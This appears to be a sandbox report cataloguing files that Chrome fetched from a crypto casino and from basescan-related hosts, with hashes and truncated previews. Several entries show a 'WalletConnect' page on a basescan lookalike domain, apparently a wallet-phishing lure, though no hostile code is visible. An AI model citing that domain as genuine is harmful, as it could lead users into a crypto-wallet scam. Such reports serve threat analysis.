                                                                                                                                                                                                                                              Preview:const e=`<h2>Crypto Online Casino</h2>.<p>Casinos online have not always been around, but we can safely say that online casinos have been used a lot since they came on the market. And it's not in short demand nor options, and now in 2023, we have 1000s and 1000s to pick from . it's just a matter of what you like and what payment options you would like to see at the casino.</p>.<p>Players are always looking for something new, which will help make the gaming experience so much better and more accessible. Allowing the player to focus on the absolute fun of a casino, that's right, the games themselves.</p>..<div class="other-info">. <p>That's why we are now going to tell you all you need to know about a crypto casino or bitcoin gambling or bitcoin casino, whatever you want to call it.</p>. <h2>What is crypto?</h2>. <p>Before discussing what casino games you can play, you first need to understand what crypto is and why people prefer to use this payment option when you play your favorit
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (3497)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3500
                                                                                                                                                                                                                                              Entropy (8bit):5.36940427983699
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:4I4uOgJUMXT8lxetrYpzia1imVJ8FOFqiFXrjYI7g9sSBJZt1WNueLPuEwWJ5ura:qdQZG31+qqmXfYI7g9lnZmJJGqDf
                                                                                                                                                                                                                                              MD5:670D8C870892FEB70482D251AACE2D8A
                                                                                                                                                                                                                                              SHA1:A5E77D344C1A2C4DA9A66C17D09DB50AB98EE0D3
                                                                                                                                                                                                                                              SHA-256:FBE331CF7183F426205F094214ABF305972A0ADD67FC0F46ED606966898A9DC4
                                                                                                                                                                                                                                              SHA-512:3DA1AA0E6A7FE6ECCDB8283A8A918E775EE302777C1450C8C22EB7870CE9D4C8EE790224ED7DDF8B8069555AE035639F7F14627CB443F29BFE3B2E3945D8B435
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/Block-LQQkMNS-.js
                                                                                                                                                                                                                                              Preview:import{ac as m,ab as d,c as e,ad as h,Q as x,i as s,ae as _,t as r,x as p,a8 as g,B as u,r as w,l as v,f as c,m as P,e as y}from"./index-DD2Zk4iT.js";var b=c('<div><h2 class="mt-4 text-center text-lg font-extrabold"></h2><p class="mt-4 text-center font-semibold text-secondary"></p><div class="mt-4 flex items-center"></div><div class="mt-2 flex font-semibold center mb-6">'),V=c('<svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 32 32"class="icon size-6 text-brand"><path d="M12.0434 17.0183C12.9801 17.0183 13.7395 17.7778 13.7395 18.7145V25.3283C13.7395 26.265 12.9801 27.0244 12.0434 27.0244H10.2648C8.85937 27.0244 7.721 25.8852 7.721 24.4806V19.5629C7.721 18.1575 8.86019 17.0191 10.2648 17.0191H12.0434V17.0183ZM21.8077 17.0183C23.2132 17.0183 24.3515 18.1575 24.3515 19.5621V24.4798C24.3515 25.8852 23.2123 27.0236 21.8077 27.0236H20.0291C19.0925 27.0236 18.333 26.2641 18.333 25.3275V18.7136C18.333 17.777 19.0925 17.0175 20.0291 17.0175L21.8077 17.0183ZM15.9999 4.97559C22.6881 4.97559 28
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x133, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2727
                                                                                                                                                                                                                                              Entropy (8bit):7.375953900060747
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Ull06uETAGSY4gLDgQTgikVCrU82W3NkK9lk:U0EAY3DrTgUiKo
                                                                                                                                                                                                                                              MD5:5EBFFD9AB8D25F77110FAA46AC1AF9F4
                                                                                                                                                                                                                                              SHA1:D4DBC04625D984D5F327D3FA17EFCA7F97391247
                                                                                                                                                                                                                                              SHA-256:216C371BC6339CBEE465018A89AF686BD40C4FDCC0BA66ACB7089351038D3BC7
                                                                                                                                                                                                                                              SHA-512:8B268F6207DF0C34050F744965D8BC233166CB2AB36A1DF3EB73C4F2E4173BF4EB9BD12F6211DC561F4E8D2509AD1E71190C4CFAC4C0316B8EFAC3AC17EE1C09
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\........d.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (352), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                                              Entropy (8bit):4.816586230245766
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:fWPAorES6v26SfVVVVVVVVdJCSdmFoipZNQVQVQVQVQVQVQVQVQ1:GAK76+6SrTAZNiiiiiiiiK
                                                                                                                                                                                                                                              MD5:1FB12D87626B426B9559B23948D0D07B
                                                                                                                                                                                                                                              SHA1:BA9E36BF01A0721E617B9262DDCC0F47BE60F11F
                                                                                                                                                                                                                                              SHA-256:4E221FF93A2AFDBAED72B0A9F13955FFE3D4364B982DCF13F4BD95D0A2085E2A
                                                                                                                                                                                                                                              SHA-512:E1D52BF31E6A5932E388B16337D962524044E6273E2FE6077A4FF1729F5B9E38E7DD51B4502EB6395F5BB80088A1C6AD35AB2DAF29FF275939B571F7728894AA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISawlvMfxBHhCuoRIFDRppjN8SBQ09H1M8EgUNWrHXEBIFDcGhthwSBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EhcJZYhefQAA49wSBQ0aaYzfEgUNPR9TPBIQCUEJ0hJnBK5aEgUNWrHXEBIQCVoE179YuGNkEgUNwaG2HBJPCeOnJjUFUj4tEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_w==?alt=proto
                                                                                                                                                                                                                                              Preview:Cn4KBw0aaYzfGgAKBw09H1M8GgAKBw1asdcQGgAKBw3BobYcGgAKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKEgoHDRppjN8aAAoHDT0fUzwaAAoJCgcNWrHXEBoACgkKBw3BobYcGgAKWgoHDTHlL/4aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAAoHDQbtu/8aAA==
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (60162), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):60447
                                                                                                                                                                                                                                              Entropy (8bit):5.131970132953784
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:X4YN+vOLYGmObgUDZM8fW+l3sLaSLPe6CMhYVRK0H/9V2Vz/kq8GPnlvG/AD22bj:XX+GXht8xmwYYLsHPnAx
                                                                                                                                                                                                                                              MD5:50227698239C2613E481717AFE57D011
                                                                                                                                                                                                                                              SHA1:5E1C8083B20E96856E86F15C7D0966812D8AF464
                                                                                                                                                                                                                                              SHA-256:97EA5BB04788D41D2DC6A2C787AC57858ADDE676E32961535124C102AD3201F4
                                                                                                                                                                                                                                              SHA-512:058F52C94ED615C4D059A1BFFDAD60CBDAD506D57AE15EF774BC01AD32D73827769E88EF44DDF5E1BC04D01E1B42105E1E8B4B9E1BFFD98ADE5CC891A1AB6AA1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/bootstrap/bootstrap.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*!.. * Bootstrap v5.2.1 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){if(t&&t.__esModule)return t;const e=Object.create(null,{[Symbol.toStringTag]:{value:"Module"}});if(t)for(const i in t)if("default"!==i){const s=Object.getOwnPropertyDescriptor(t,i);Object.defineProperty(e,i,s.get?s:{enumerable:!0,get:()=>t[i]})}return e.default=t,Object.freeze(e)}const i=e(t),s="transitionend",n=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (616), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                                              Entropy (8bit):4.515499583512706
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:EkvFrWH0s0s0s0s0s0s0s0s1PAQ6Pm6SfVVVVVVVVmn:EkUAQ6+6Sun
                                                                                                                                                                                                                                              MD5:6586FB3593FB45789F0ECD2A3C5EC91F
                                                                                                                                                                                                                                              SHA1:4543AC303F9EF1E635FC3DD20003AB9DA55B6EFA
                                                                                                                                                                                                                                              SHA-256:D3462731D0B5650F15D7B46CC97E4E088A1B392C5CBBFD8B6598566E71192928
                                                                                                                                                                                                                                              SHA-512:A9B4D002E779391F0CF5C4CBAEF849886357B8FB96D9AE6B96EB782CD6FDF186EB1424D1DB56644333A5E6D87FDD1DF8D0D39BB867EAA52B2E8D64DA77C433FE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISuAEJs_xxhmE43c8SBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EhcJZYhefQAA49wSBQ0aaYzfEgUNPR9TPBIQCUEJ0hJnBK5aEgUNWrHXEBJdCVoE179YuGNkEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEk8J46cmNQVSPi0SBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_?alt=proto
                                                                                                                                                                                                                                              Preview:CuEBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAApsCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14501)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):14502
                                                                                                                                                                                                                                              Entropy (8bit):5.851446590919882
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:xUbKb1NPM87XaH6EeK7IFNKTCBw6bgCtE2eEQr4/LykxP1TUffJBErDTQ3:xX7zdgGkp6bgCtE2eE7/ZPSfxkQ3
                                                                                                                                                                                                                                              MD5:1B5697DCD2764BD06769A877160FB4AB
                                                                                                                                                                                                                                              SHA1:3592B50B71A5BD77DB11F25E710D4F7A46CDBAAB
                                                                                                                                                                                                                                              SHA-256:CBBB8214F30F340FADE4A8FD3A1E6A2D66DD98ABC6F6C4C282CBFB8D0E0CF0FB
                                                                                                                                                                                                                                              SHA-512:875C78E1E61AD8EDA282D68AF6A989CAC134142C1C0C82B90B0E9BA97DDFEC3B1AD9BD6F39B2F1E2E3A143A7FDE6D3D826270A2C4CC6434004BF4E57762F5771
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const s="/modules/bonus2/assets/bcd-rakeback-rule-banner-b2abb788.png",e="/modules/bonus2/assets/bcd-rakeback-rule-banner_light-f992d1b3.png",n="/modules/bonus2/assets/rakeback-bg-ba7bf28a.png",o="/modules/bonus2/assets/rakeback-coin-fiat-0d6c9b7d.png",t="/modules/bonus2/assets/rakeback-coin-2ac02f51.png",A="/modules/bonus2/assets/bonus-bcd-link-66b2f09c.png",a="/modules/bonus2/assets/bonus-lottery-link-0e222b0b.png",c="/modules/bonus2/assets/shine-light-63165faf.png",u="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACYAAAAxCAMAAACBMCu/AAAAh1BMVEUAAAD/5gD/6AD/+AD//wD/5wD/5wD/5wD/6AD/7AD/8AD/5gD/5wD/5wD/6AD/5gD/6AD/6gD/5wD/5wD/5wD/5wD/5wD/6AD/6AD/6QD/6AD/6QD/5wD/5wD/5wD/5wD/5gD/5wD/6AD/6QD/6AD/5wD/5gD/5gD/5gD/5gD/5gD/6wD/5gCx9Z+VAAAALHRSTlMA7IMJBvazlzYdEPjUp1lSKSTy6NydfXBgUEs84cq9uKSQbDIW3s7Nr65oGlS5oqQAAAEPSURBVDjLjdPnkoIwFIbhA5Hemwiou5bt3/1f3zoZmaCG5Dy/30kPaWyIJedlvmBlzsSpSvSc7Bc+J8vgsJYGhPYqBODaMxfApz1rcVMy5uTM2smssdxr7EHaWTcgtcbhrjXuevMNzLxqvdpBSeO1akiw8BXpqx6PmkkTRRmeJafniWPXg4ZzFq
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (39886), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):39886
                                                                                                                                                                                                                                              Entropy (8bit):5.416171406617656
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:nr9Bg3avSgxOvyEYAxeI88/AZkNenSbnM7Vp6Y66o+W0BB3dKF2oDPrN50jTQnpk:EQd8/AAekT6xB3dw7rIQnpt+wG1yJPyN
                                                                                                                                                                                                                                              MD5:AA73D18978D6A868CFE42E5E7EF3650A
                                                                                                                                                                                                                                              SHA1:F21FD672A1B3FABA8D6C19C889DA301B6DBD2D2B
                                                                                                                                                                                                                                              SHA-256:EC0429821FC8F95029086A142DD8C88B1B734AE3B9595A2A1C6B4F78022131BA
                                                                                                                                                                                                                                              SHA-512:1D1821062C5BD4A39E8082D95F331CDFDEBB62329474818A6CF23C45460823E78AF4B8C302055796CB1FF7F170A35EB4D5EC38D829E083594CB87DEE60ECE0FC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"undefined"!=typeof module&&module.exports?module.exports=e:e(jQuery,window,document)}(function(e){var t,o,a,n,i,r,l,s,c,d,u,f,h,m,p,g,v,x,_,w,S,b,C,y,B,T,k,M,O,I,D,E,W,R,A,L,z,P,H,U,F,q,j,Y,X,N,V,Q,G,J,K,Z,$,ee,te,oe,ae,ne,ie,re;ne="function"==typeof define&&define.amd,ie="undefined"!=typeof module&&module.exports,re="https:"==document.location.protocol?"https:":"http:",ne||(ie?require("jquery-mousewheel")(e):e.event.special.mousewheel||e("head").append(decodeURI("%3Cscript src="+window.location.origin+"/assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js%3E%3C/script%3E"))),o="mCustomScrollbar",a="mCS",n=".mCustomScrollbar",i={setTop:0,setLeft:0,axis:"y",scrollbarPosition:"inside",scrollInertia:950,autoDraggerLength:!0,alwaysShowScrollbar:0,snapOffset:0,mouseWheel:{enable:!0,scrollAmount:"auto",axis:"y",deltaFactor:"auto",disableOver:["select","option","keygen","datalist","textarea"]},scrollButtons:{s
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4414
                                                                                                                                                                                                                                              Entropy (8bit):5.323606616610612
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:1JEDIMtf6bq96LSS5XdDnUdxtoGEzi7f/E/v/jmn9UOOLNJcJ+jD:EDd/gOSNdDUdvdn7f8Hbm9gNaJKD
                                                                                                                                                                                                                                              MD5:08BF7F3BCC5CDCC1A72C4BCDD6B82FD1
                                                                                                                                                                                                                                              SHA1:A74483B33B91A08E8FE1F860E42C425BF405BAC1
                                                                                                                                                                                                                                              SHA-256:D1905F143F6161EE2803174CC0587F56F9BD00356279CA66B68D7EC7ABD1924E
                                                                                                                                                                                                                                              SHA-512:AA83B38BE6A52E08A237F03C1AAE8FFC4554643E95E4A9DC87F8CC226997298E66F8E39E5391DCC8E078B3250D8AAEC99AF9E3EC0ADC7CFC0881F936B87AC2DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/toast-register-be78efcc.js
